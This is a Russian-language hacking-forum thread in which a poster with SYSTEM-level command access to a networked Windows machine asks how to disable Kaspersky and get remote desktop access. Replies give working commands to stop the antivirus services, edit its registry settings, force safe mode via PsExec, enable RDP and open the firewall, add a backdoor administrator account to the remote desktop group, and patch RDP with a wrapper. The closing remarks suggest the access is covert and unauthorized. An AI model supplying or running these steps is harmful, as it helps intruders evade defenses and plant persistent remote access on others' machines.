Знатокам и администраторам Windows вопрос

В локальной сети есть машина, с доступом к cmd с правами локального админа. Но хочется получить рабочий стол (VNC или RDP). На машине запущен kaspersky internet security. Который фильтрует почти всё.

.SpoilerTarget" type="button">Spoiler: nmap
Host is up (0.041s latency).

Not shown: 992 closed ports

PORT STATE SERVICE

135/tcp filtered msrpc

139/tcp filtered netbios-ssn

445/tcp filtered microsoft-ds

1110/tcp filtered nfsd-status

1947/tcp open sentinelsrm

2869/tcp filtered icslap

3389/tcp filtered ms-wbt-server

19780/tcp filtered unknown
Вопрос собственно такой: как через pstools и командную строку отключить kaspersky или открыть порты для подключения?

tskill ksde /a /v - работает, но тут же запускается новый процесс.

tskill avp /a /v - не работает, ошибка доступа

taskkill - ошибка доступа, whoami при этом NT AUTHORITY\система

Подскажите варианты, а то в этом windows все так не однозначно...

Тебе ничем не поможет то что ты прихлопываешь юзермодную часть. Авер прописывается в ядре и он знает об этих фокусах.

Представь что было-бы если-бы какой-нибудь вирус взял и через cmd закрыл Касперского. Да это даже не смешно

а если например отключить службу и перезагрузить машину?

Попробуй остановить службы касперского через командную строку.

У меня так он убивается:

net stop AVP

net stop klnagent

Не даёт. Ещё не понятно то-ли pstools кривой, то-ли windows пиратский так работает, не все команды обрабатывает корректно, запускать cmd в интерактивную режиме совсем отказывается.

https://pastebin.com/TfGA5TZY

Щас попробую совсем удалить касперского.

Если получится - свисти. Это будет занятная новость. Но не должно вроде.

с каких пор все на касперского перешли? он же не антивирус даже, насколько помню по временам криптования разных зверей

b3 said:
↑ (https://antichat.live/posts/4304013/)
с каких пор все на касперского перешли? он же не антивирус даже, насколько помню по временам криптования разных зверей


А я на нем дооолго сидел. В принципе он неплохо отрабатывал детект связок а от него в принципе это и требуется. Екзешник можно проверить и на вирустотале, перед тем как опрометчиво его запустить, а вот ежели кто пробьет Мозилу - будет совсем другая песня, довольно грустная. Вопроц сей религиозен

b3 said:
↑ (https://antichat.live/posts/4304013/)
с каких пор все на касперского перешли? он же не антивирус даже, насколько помню по временам криптования разных зверей


В моей конторе он корпративный на отдельном серваке и с юзверьским клиенскми ПО.

Хорошо убивается отключением его служб.

molemime said:
↑ (https://antichat.live/posts/4304005/)
Не даёт. Ещё не понятно то-ли pstools кривой, то-ли windows пиратский так работает, не все команды обрабатывает корректно, запускать cmd в интерактивную режиме совсем отказывается.
https://pastebin.com/TfGA5TZY
Щас попробую совсем удалить касперского.


С пастбина я б так побывал:

net stop AVP19.0.0

net stop KSDE1.0.0

user100 said:
↑ (https://antichat.live/posts/4304019/)
С пастбина я б так побывал:
net stop AVP19.0.0
net stop KSDE1.0.0


Не получается, ошибка доступа.

Теоретически один вариант остается:

.\PsExec64.exe \\10.0.40.229 -s 'c:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 19.0.0\avp.com' stop firewall

Но нужно установить пароль на касперского, так:

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyL ab\AVP19.0.0\settings" /v "EnablePswrdProtect" /d "00000001" /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyL ab\AVP19.0.0\settings\def" /v "EnablePswrdProtect" /d "00000001" /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyL ab\KSDE1.0.0\settings" /v "EnablePswrdProtect" /d "00000001" /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyL ab\KSDE1.0.0\settings\def" /v "EnablePswrdProtect" /d "00000001" /f

Но опять же... Ошибка доступа. Надо делать в безопасном режиме (http://forum.oszone.net/post-622417-296.html)!

Отправляю машину в безопасный режим:

.\PsExec64.exe \\10.0.40.229 -s bcdedit /set safeboot network

.\PsExec64.exe \\10.0.40.229 -s shutdown /r

Вернулась, пингуется, но нет связи через PSTOOLS. Выходит, что касперский не такое уж и плохое решение. Но ресурсозатротность у него выше чем у тоже NOD.

Было решить попробовать другой хост, там нет антивируса но порты все равно закрыты.

Обе машины при этом в домене почему на них не распространяются политики домена по удаленному доступу - непонятно:

https://pastebin.com/v3atAFHp

И все равно вижу такое:

.SpoilerTarget" type="button">Spoiler: nmap
PS C:\Users\kpv\Downloads\nmap> .\nmap.exe --open -Pn 10.0.40.213

Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-28 22:17 RTZ 4 (ceia)

Nmap scan report for 10.0.40.213

Host is up (0.00062s latency).

Not shown: 997 closed ports

PORT STATE SERVICE

135/tcp open msrpc

139/tcp open netbios-ssn

445/tcp open microsoft-ds

MAC Address: 40:16:7E:0E:75A (Asustek Computer)

Nmap done: 1 IP address (1 host up) scanned in 3.00 seconds

PS C:\Users\kpv\Downloads\nmap>

UPDATE

Без антивируса RDP включается так:

psexec.exe \\ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

psexec.exe \\ netsh firewall set service RemoteDesktop enable


Причем даже перезагружать ничего не надо. Срабатывает сиюсекундно.

Завтра буду мучить защищенную машину, надо дождаться реакции пользователя на безопасный режим.

А что мешает подключиться по RDP и вырубить каспера, либо же добавить в исключения нужный софт? Создай нового пользователя:


Code:
net user New_user PassW0rd /add
net localgroup Администраторы New_user /add
net localgroup "Пользователи удаленного рабочего стола" New_user /add

Так как это не серверная, пропатчи с помощью RDP Wrapper Library (https://github.com/stascorp/rdpwrap/releases/tag/v1.6.2):


Code:
Rdpwinst -i -o

Раз уж это десятка, то может не патчиться(они постоянно обновления выпускают тогда ищи нужную версию rdpwrap.ini тут (https://github.com/fre4kyC0de/rdpwrap) или в гоше, по запросу "rdpwrap.ini [номер винды] github.com".

И после установки обнови:


Code:
Rdpwinst -w

molemime said:
↑ (https://antichat.live/posts/4303855/)
с доступом к cmd с правами локального админа


Обязательно по локалке подключаться. TeamViewer возможно не заблокирует, т.к. там другой способ подключения. Или через планировщик возможно autoit скрипт запустить, он уже сделает остальное.

Так как сеть доменная. Сперва запускаю RDP служ. на локальной машине. Касперски тут бессилен.

Повезло, что права админские, сделал своё дело и ушел.